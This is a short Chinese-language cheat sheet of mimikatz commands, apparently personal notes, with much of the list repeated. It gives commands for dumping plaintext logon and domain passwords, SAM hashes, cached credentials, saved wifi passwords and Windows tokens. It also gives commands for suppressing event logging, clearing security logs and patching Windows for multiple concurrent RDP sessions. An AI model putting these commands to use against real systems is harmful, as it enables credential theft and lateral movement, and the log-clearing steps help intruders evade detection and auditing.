mimikatz用法
privilege::debug 进入debug模式
sekurlsa::logonPasswords 查看所有用户密码
sekurlsa::wdigest 读取当前登录用户
process::list 查看进程
process::suspend /pid:5576 暂停5576(计算器程序)
process::resume /pid:5576 恢复5576(计算器程序)
event::drop 后面的操作不再产生日志
event::clear 清除所有日志
misc::cmd 打开CMD
misc::regedit 打开regedit
misc::taskmgr 打开任务管理器
默认windows桌面只能一个用户使用,如果使用远程桌面就会被挤掉
但是mimikatz可以打一个补丁,使得多人可以同时在线
ts::multirdp 打补丁开启多人远程桌面
minesweeper::infos 扫雷开挂
参考网址:http://wy.hx99.net/searchdrops.php?q=mimi
privilege::debug 提权为system debug权限
sekurlsa::logonPasswords 列出当前登录的用户明文密码,包含wdigest kerberos
sekurlsa::kerberos 读取域下的用户会话明文密码
sekurlsa::wdigest 读取本地用户会话的明文密码
process::list 列出当前系统的所以进程
process::start cmd.exe 启动进程
process::stop /pid:2844 关闭进程
process::suspend /pid:2768 暂停进程
process::resume /pid:2768 恢复进程
service::list 列出服务
lsadump::sam 获取sam文件的hash值
lsadump::cache 获取缓存内容
ts::session 查看现有的登录会话
ts::multirdp 远程桌面单用户多会话补丁
event::clear 清除安全日志
event::drop 后面的操作不再产生新的日志
minesweeper::infos 扫雷透视
misc::cmd 打开cmd
misc::regedit 打开注册表
misc::taskmgr 任务管理器
misc::wifi 查看所有以保存的wifi密码
token::list 列出windows票据
token::whoami 列出当前会话票据